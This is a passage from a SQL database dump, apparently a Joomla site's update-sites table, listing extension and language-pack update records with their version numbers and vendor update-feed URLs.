package','pkg_akeeba','package','',0,'7.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-1.html\n				',''),(10773,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10774,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10775,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10776,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10777,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10778,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10779,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10780,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10781,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10782,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10783,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10784,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10785,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10786,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10787,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10788,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10789,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10790,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10791,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10792,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10793,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10794,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10795,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10796,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10797,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10798,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10799,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10800,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10801,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10802,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10803,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10804,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10805,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10806,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10807,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10808,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10809,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10810,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10811,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10812,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10813,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10814,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10815,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10816,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10817,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10818,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10819,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10820,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10821,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10822,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10823,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10824,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10825,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(10826,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(10827,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(10828,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(10829,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(10830,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(10831,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(10832,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10833,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10834,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10835,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10836,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10837,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10838,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10839,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10840,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10841,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10842,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10843,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10844,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10845,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10846,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10847,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10848,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10849,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10850,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10851,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10852,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10853,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10854,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10855,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10856,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10857,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10858,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10859,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10860,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10861,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10862,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10863,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10864,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10865,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10866,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10867,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10868,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10869,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10870,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10871,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10872,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10873,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10874,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10875,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10876,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10877,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10878,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10879,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10880,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'7.0.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n					https://www.akeebabackup.com/download/akeeba-backup/7-0-1.html\n				',''),(10881,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.10','','http://cdn.akeebabackup.com/updates/fef.xml','\n					https://www.akeebabackup.com/download/fef/1-0-10.html\n				',''),(10882,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(10883,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.1','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n					https://www.akeebabackup.com/download/fof3/3-5-1.html\n				',''),(10884,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10885,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10886,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10887,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10888,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10889,3,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10890,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10891,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10892,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10893,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10894,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10895,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10896,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10897,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10898,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10899,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10900,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10901,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10902,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10903,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10904,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10905,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10906,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10907,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10908,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10909,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10910,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10911,3,0,'English US','','pkg_en-US','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10912,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10913,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10914,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10915,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10916,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10917,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10918,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10919,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10920,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10921,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10922,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10923,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10924,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10925,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10926,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10927,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10928,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10929,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10930,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10931,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10932,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(10933,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(10934,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(10935,1,0,'Joomla','','joomla','file','',0,'3.9.15','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(10936,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(10937,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(10938,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(10939,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(10940,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(10941,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(10942,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(10944,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(10945,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(10946,57,0,'French','','pkg_fr-FR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(10947,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(10948,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(10949,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(10950,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(10951,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(10952,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(10953,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(10954,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(10955,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(10956,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(10957,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(10958,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(10959,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(10960,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(10961,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(10962,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(10963,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(10964,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(10965,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(10966,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(10967,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(10968,57,0,'English US','','pkg_en-US','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(10969,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(10970,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(10971,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(10972,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(10973,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(10974,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(10975,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(10976,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(10977,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(10978,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(10979,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(10980,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(10981,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(10982,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(10983,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(10984,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(10985,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(10986,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(10987,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(10988,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(10989,57,0,'German 